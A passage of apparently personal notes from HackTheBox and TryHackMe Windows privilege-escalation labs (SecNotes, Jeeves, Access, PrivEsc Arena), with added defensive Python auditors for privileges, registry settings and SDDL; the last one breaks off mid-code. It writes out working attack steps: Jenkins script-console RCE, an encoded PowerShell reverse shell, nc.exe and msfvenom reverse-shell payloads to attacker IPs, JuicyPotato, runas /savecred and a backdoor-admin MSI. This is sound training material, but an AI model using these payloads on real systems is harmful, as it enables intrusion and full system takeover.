   13  cat /proc/filesystems
   14  sudo modprobe cifs
   15  smbclient
   16  apt install smbclient
   17  smbclient
   18  smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
   19  > .bash_history
   20  less .bash_history
   21  whoami
```

And it worked.

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Fri Jun 22 00:24:29 2018
  bootmgr                          AHSR   395268  Fri Jul 10 13:00:31 2015
  BOOTNXT                           AHS        1  Fri Jul 10 13:00:31 2015
  Config.Msi                        DHS        0  Mon Jan 25 16:24:50 2021
  Distros                             D        0  Fri Jun 22 00:07:52 2018
  Documents and Settings          DHSrn        0  Fri Jul 10 14:21:38 2015
  inetpub                             D        0  Fri Jun 22 03:47:33 2018
  Microsoft                           D        0  Fri Jun 22 23:09:10 2018
  pagefile.sys                      AHS 738197504  Mon Nov 14 21:32:51 2022
  PerfLogs                            D        0  Thu Apr 12 01:38:20 2018
  php7                                D        0  Thu Jun 21 17:15:24 2018
  Program Files                      DR        0  Tue Jan 26 11:39:51 2021
  Program Files (x86)                DR        0  Tue Jan 26 11:38:26 2021
  ProgramData                        DH        0  Sun Aug 19 23:56:49 2018
  Recovery                         DHSn        0  Thu Jun 21 23:52:17 2018
  swapfile.sys                      AHS 16777216  Mon Nov 14 21:32:52 2022
  System Volume Information         DHS        0  Thu Jun 21 23:53:13 2018
  Ubuntu.zip                          A 201749452  Fri Jun 22 00:07:28 2018
  Users                              DR        0  Fri Jun 22 00:00:39 2018
  Windows                             D        0  Tue Jan 26 11:38:46 2021

		7736063 blocks of size 4096. 3384441 blocks available
smb: \>
```

Another way:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file YcZOqIUv.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service Vnbo on 10.10.10.97.....
[*] Starting service Vnbo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> whoami
nt authority\system

C:\WINDOWS\system32> hostname
SECNOTES
```

wmiexec and smbexec are other ways to get a shell.

## Impersonation and Potato Attacks- Jeeves

### Access to the machine

It has a search engine called Jeeves on port 80. When you search for something it returns what looks like an error, but it is just a screenshot (http://10.10.10.63/jeeves.PNG).
Another web server on port 50000 returns a 404 signed "Powered by Jetty:// 9.4.z-SNAPSHOT".

nmap:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Jeeves]
└─$ sudo nmap -A -T5 -p80,135,445,50000 10.10.10.63 -oN nmap.out
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 17:13 CET
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.82% done; ETC: 17:14 (0:00:00 remaining)
Nmap scan report for 10.10.10.63
Host is up (0.052s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|2016|7|Vista (90%), FreeBSD 6.X (86%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:freebsd:freebsd:6.2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 10 1511 - 1607 (87%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows Vista SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-11-15T21:14:26
|_  start_date: 2022-11-15T21:10:23
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   50.90 ms 10.10.14.1
2   51.02 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.94 seconds
```

wfuzz (dirb doesn't cope well with big wordlists):

```bash
┌──(aml㉿kali)-[~]
└─$ wfuzz -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://10.10.10.63:50000/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.63:50000/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000041607:   302        0 L      0 W        0 Ch        "askjeeves"
```

http://10.10.10.63:50000/askjeeves/

Some guesser, really! It's a Jenkins, let's RCE it!
We go to http://10.10.10.63:50000/askjeeves/script

```groovy
def var = "C:\\Windows\\System32\\whoami.exe"
var.execute().text

> Result: jeeves\kohsuke
```

```groovy
def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c "ls"'
var.execute().text

> Result:

    Directory: C:\Users\Administrator\.jenkins

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        11/3/2017  10:33 PM                jobs
d-----        11/3/2017  10:33 PM                logs
d-----        11/3/2017  10:33 PM                nodes
d-----        11/3/2017  10:44 PM                plugins
[...]
```

And the reverse shell:

```groovy
def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQAiACwAOAA4ADcANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
var.execute().text
```

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Jeeves]
└─$ nc -nlvp 8877
listening on [any] 8877 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49676
whoami
jeeves\kohsuke
PS C:\Users\Administrator\.jenkins> hostname
Jeeves
PS C:\Users\Administrator\.jenkins>
```

### PrivEsc w/ Impersonation Privileges

```bash
PS C:\Users\Administrator\.jenkins> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```

Downloaded JuicyPotato from https://github.com/ohpe/juicy-potato/releases/tag/v0.1

Uploaded from Jenkins with:

```groovy
def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c "Invoke-WebRequest -Uri http://10.10.14.5:8081/jp.exe -OutFile jp.exe"'
var.execute().text
```

Also uploaded nc.exe and GetCLSID.ps1 (https://raw.githubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1).

It's a Windows 10 Pro according to systeminfo. From https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/ we get a CLSID, for example "{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}" for TrustedInstaller.

```bash
PS C:\Users\Administrator\.jenkins> . ./jp.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}" -z
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\SYSTEM
```

```bash
./jp.exe -l 1337 -c '{03ca98d6-ff5d-49b8-abc6-03dd84127020}' -p c:\windows\system32\cmd.exe -a "/c c:\users\administrator\.jenkins\nc.exe -e cmd.exe 10.10.14.5 9999" -t *
```

And it works. But the root flag tells you it's somewhere else...
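The `whoami /priv` listing above is the signal that decides the whole section: a service account holding SeImpersonatePrivilege. Below is an added triage helper (my own example, not from the course or JuicyPotato) that parses a captured `whoami /priv` listing and reports which token privileges in it belong to the impersonation / token-abuse family, so an auditor can flag service accounts that should not hold them. The sample is a copy of the output shown above; the set of "high-risk" privilege names is this example's own assumption.

```python
"""Added example: flag token privileges that enable impersonation-style abuse.

The sample listing is copied from the `whoami /priv` output on this page.
"""
import re

# Assumed list for this example: privileges that let a process act in another
# security context or tamper with the OS. Any of them on a service account is
# worth a finding, whether currently Enabled or merely present (Disabled).
HIGH_RISK_PRIVS = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeLoadDriverPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
}

SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# One table row: name, free-text description, then the State column.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def risky_privs(privs):
    """Subset of the token's privileges that are in HIGH_RISK_PRIVS.

    A Disabled privilege still counts: the holder can enable it on its own
    token, so presence is what matters for the finding."""
    return {name: state for name, state in privs.items() if name in HIGH_RISK_PRIVS}


if __name__ == "__main__":
    found = risky_privs(parse_privs(SAMPLE))
    for name, state in found.items():
        print(f"FINDING: {name} present ({state})")
```

The same parser can be pointed at listings collected from each service account in an environment; the remediation for a web/CI service is to run it under an account without SeImpersonatePrivilege (a virtual service account or a plain local account instead of LocalService/NetworkService), which removes the precondition for the potato family entirely.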
`find /n "root"` is taking too long...

## RunAs - Access

### Enumeration

Ports 21, 23 and 80. On port 80, dirb found /aspnet_client/. FTP has anonymous login allowed. Two folders:

- Backups - backup.mdb (an Access database; mdbopener.com is not working, mdbviewer.herokuapp.com is). I had to download it after running "binary" in the ftp client first.
- Engineer - Access Control.zip (password-protected)

In the mdb, in "auth_user":

```
admin:admin
engineer:access4u@security
backup_admin:admin
```

access4u@security is the zip password. The zip contains a .pst; with `readpst Access\ Control.pst` we can open it and read it:

From john@megacorp.com To security@accesscontrolsystems.com: "The password for the 'security' account has been changed to 4Cc3ssC0ntr0ller. Please ensire this is passed on to your engineers. Regards, John."

With telnet we get a console as the user access\security.

### Privesc

`cmdkey /list` returns:

```
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    User: ACCESS\Administrator
    Type: Domain Password
```

NOTE: runas runs the command but prints nothing. So the privesc is launched with:

```bash
runas /savecred /user:ACCESS\Administrator "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"
```

## Registry - THM windowsprivescarena

Now THM comes into play, with https://tryhackme.com/room/windowsprivescarena#

We spin up a Windows box and get in over RDP with *user:password*. xfreerdp errors out, so we use rdesktop: `rdesktop -u user -p password321 10.10.168.218`

### Enumeration - Autorun

We launch `C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe`, which brings up a tool with lots of information about the running processes; among them we see one called "My Program" and its install path.
Then in CMD we run:

```bash
C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
```

We can see that the "Everyone" group has "FILE_ALL_ACCESS". Another way to find it? We set up PowerUp with:

```bash
powershell.exe -ep bypass
. ./PowerUp.ps1
Invoke-AllChecks
```

Which returns something like:

```bash
[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False

ServiceName    : unquotedsvc
Path           : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart     : True

ServiceName    : unquotedsvc
Path           : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart     : True

[*] Checking service executable and argument permissions...

ServiceName                     : filepermsvc
Path                            : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile                  : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'filepermsvc'
CanRestart                      : True

[*] Checking service permissions...

ServiceName   : daclsvc
Path          : "C:\Program Files\DACL Service\daclservice.exe"
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart    : True

[*] Checking %PATH% for potentially hijackable DLL locations...

Permissions       : {ReadAttributes, ReadControl, Execute/Traverse, WriteAttributes...}
ModifiablePath    : C:\Temp
IdentityReference : NT AUTHORITY\Authenticated Users
%PATH%            : C:\Temp
AbuseFunction     : Write-HijackDll -DllPath 'C:\Temp\wlbsctrl.dll'

Permissions       : {GenericWrite, Delete, GenericExecute, GenericRead}
ModifiablePath    : C:\Temp
IdentityReference : NT AUTHORITY\Authenticated Users
%PATH%            : C:\Temp
AbuseFunction     : Write-HijackDll -DllPath 'C:\Temp\wlbsctrl.dll'

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

Key            : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program
Path           : "C:\Program Files\Autorun Program\program.exe"
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autorun Program\program.exe; IdentityReference=Everyone}

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

[*] Checking for cached Group Policy Preferences .xml files....
```

And there, under "Checking for modifidable registry autoruns and configs", we have it :)

### Exploitation - Autorun

```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

We upload it and drop it in "C:\Program Files\Autorun Program". We check that it works:

```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49216
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
whoami
tcm-pc\user
```

Yay! We overwrite the program.exe that was already in the Autorun folder with the new one (this needs privileges; I don't understand whether I skipped something :c ).

EDIT: I think that if, instead of downloading the file and then moving it, we downloaded it straight into the final folder with the same name, it would count as editing it and would go through... To be tested.

Now, whenever a user logs into the system, a little prompt pops up saying "Are you sure you want to run this software?" while trying to run the program. If they click Run, we're in.

```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49279
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
tcm-pc\tcm
```

### Enumeration - AlwaysInstallElevated

We go back and log in again as "user".
We notice PowerUp.ps1 also tipped us off about this:

```bash
[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI
```

The way to check it now is to verify that both registry values are set to 1:

```bash
PS C:\Users\user> reg query HKLM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

PS C:\Users\user> reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```

### Exploitation - AlwaysInstallElevated

Since PowerUp.ps1 said the abuse function was "Write-UserAddMSI", let's look at it (it lives inside PowerUp, so PowerUp has to be imported first).

```bash
PS C:\Users\user\Desktop\Tools\PowerUp> powershell.exe -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user\Desktop\Tools\PowerUp> . .\PowerUp.ps1
PS C:\Users\user\Desktop\Tools\PowerUp> write-useraddmsi

OutputPath
----------
UserAdd.msi

PS C:\Users\user\Desktop\Tools\PowerUp> ls

    Directory: C:\Users\user\Desktop\Tools\PowerUp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        11/25/2022  12:13 PM       8256 checks.txt
-a---         5/30/2017   2:35 AM     562841 PowerUp.ps1
-a---        11/25/2022  12:38 PM     208896 UserAdd.msi
```

Running this new little file (UserAdd.msi) lets us create a user, setting its name, password and group. By default: "backdoor:password123:Administrators". Now we can log in with this new user, as an Admin :)

```bash
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\backdoor>whoami
tcm-pc\backdoor

C:\Users\backdoor>hostname
TCM-PC

C:\Users\backdoor>
```

### Another way - AlwaysInstallElevated

We can also build a reverse shell as an MSI with msfvenom: `msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f msi > rev.msi`

And...
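Both registry findings on this page, the Winlogon autologon credentials from the Chatterbox section and the AlwaysInstallElevated pair just above, come out of `reg query` output, so one parser serves both checks. The following added example (my own code, not from the course, PowerUp or the THM room) parses `reg query` text into a key/value structure and runs the two audits: flag AutoAdminLogon=1 with a stored DefaultPassword, and report AlwaysInstallElevated only when it is 0x1 in both HKLM and HKCU, since Windows ignores the policy unless both halves are set. Samples are copies of the outputs shown on this page plus one constructed hardened HKCU variant.

```python
"""Added example: audit `reg query` output for autologon creds and AlwaysInstallElevated.

Samples are copied from this page; HKCU_INSTALLER_OFF is constructed.
"""
import re

# `reg query` prints key paths flush-left and values indented: name, type, data.
VALUE_LINE = re.compile(r"^\s{2,}(\S+)\s+(REG_\w+)\s*(.*)$")

WINLOGON_SAMPLE = r"""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe
    LegalNoticeCaption    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

HKLM_INSTALLER = r"""HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_INSTALLER = r"""HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# Constructed: the usual hardened state, where the per-user half is 0.
HKCU_INSTALLER_OFF = HKCU_INSTALLER.replace("0x1", "0x0")


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}}."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HK"):
            current = line.strip()
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                keys[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return keys


def autologon_findings(keys):
    """Flag Winlogon keys with AutoAdminLogon=1 and a plaintext DefaultPassword."""
    findings = []
    for path, values in keys.items():
        if not path.lower().endswith("\\winlogon"):
            continue
        auto = values.get("AutoAdminLogon", ("", "0"))[1]
        password = values.get("DefaultPassword", ("", ""))[1]
        if auto == "1" and password:
            user = values.get("DefaultUserName", ("", "?"))[1]
            findings.append(f"{path}: autologon enabled for {user} with a stored plaintext password")
    return findings


def always_install_elevated(hklm_text, hkcu_text):
    """True only when AlwaysInstallElevated is 0x1 in BOTH hives."""
    def is_set(text):
        for path, values in parse_reg_query(text).items():
            if path.lower().endswith("\\installer"):
                return values.get("AlwaysInstallElevated", ("", "0x0"))[1].lower() == "0x1"
        return False
    return is_set(hklm_text) and is_set(hkcu_text)


if __name__ == "__main__":
    for f in autologon_findings(parse_reg_query(WINLOGON_SAMPLE)):
        print("FINDING:", f)
    print("AlwaysInstallElevated effective:", always_install_elevated(HKLM_INSTALLER, HKCU_INSTALLER))
    print("after hardening HKCU:", always_install_elevated(HKLM_INSTALLER, HKCU_INSTALLER_OFF))
```

The fix for the first finding is to clear DefaultPassword and AutoAdminLogon (or use the LSA-secret form of autologon that Sysinternals Autologon writes); for the second, set AlwaysInstallElevated to 0 in both hives, which is what the test with the constructed HKCU variant shows.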
```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.8.32.108] from (UNKNOWN) [10.10.168.218] 49317
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```

Boh! Mind blown.

### Enumeration - regsvc

Let's see whether we have Full Control over regsvc, which is the main registry service:

```bash
PS C:\Users\user\Desktop\Tools\PowerUp> Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\services\regsvc | fl

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\regsvc
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : Everyone Allow  ReadKey
         NT AUTHORITY\INTERACTIVE Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
Audit  :
Sddl   : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)
```

In this case we do (thankfully, otherwise this box would make no sense!): `NT AUTHORITY\INTERACTIVE Allow FullControl`. It seems that's us. Right, according to this source: https://www.compartir-tecnologias.es/respuesta/urgente-grupos-especiales-ayuda-200385971.html

```
NT AUTHORITY\Authenticated Users: controls the permissions and processes of any user authenticated on that machine who has a valid ID and password.
NT AUTHORITY\Interactive manages any physical process that is not physically being carried out in the context of the locally authenticated user (e.g. the "runas" command).
Normally both "users" are included in the "Users" group; you can verify it with the following command: "net localgroup usuarios"
```

So it can indeed be us.
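The `Sddl` line that Get-Acl printed is the compact form of the same ACL, and it is the form you get back from bulk collection (`Get-Acl ... | Select Sddl` across every service key). The following added example (my own code, not from the course or the THM room) parses that SDDL string into owner, group, DACL flags and ACEs, then reports which low-privilege trustees hold full control (rights token `KA`, KEY_ALL_ACCESS) on a service key: exactly the condition that lets a non-admin rewrite the service's ImagePath. The input is the regsvc SDDL shown above; the hardened variant and the small SID-abbreviation table are constructed for the illustration.

```python
"""Added example: find low-privilege trustees with full control in a service key's SDDL.

SDDL_REGSVC is copied from this page; SDDL_HARDENED is constructed.
"""
import re

SDDL_REGSVC = "O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)"
# Constructed hardened variant: INTERACTIVE reduced to read (KR).
SDDL_HARDENED = "O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KR;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)"

# Subset of SDDL well-known SID abbreviations (assumed table for this example).
SID_NAMES = {
    "WD": "Everyone",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "AU": "NT AUTHORITY\\Authenticated Users",
    "BU": "BUILTIN\\Users",
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
}
LOW_PRIV = {"WD", "IU", "AU", "BU"}      # trustees that should never own a service key
FULL_CONTROL = {"KA", "GA"}              # KEY_ALL_ACCESS / GENERIC_ALL

# O:<owner>G:<group>D:<flags>(ace)(ace)...  ; a trailing S: (SACL) part is ignored.
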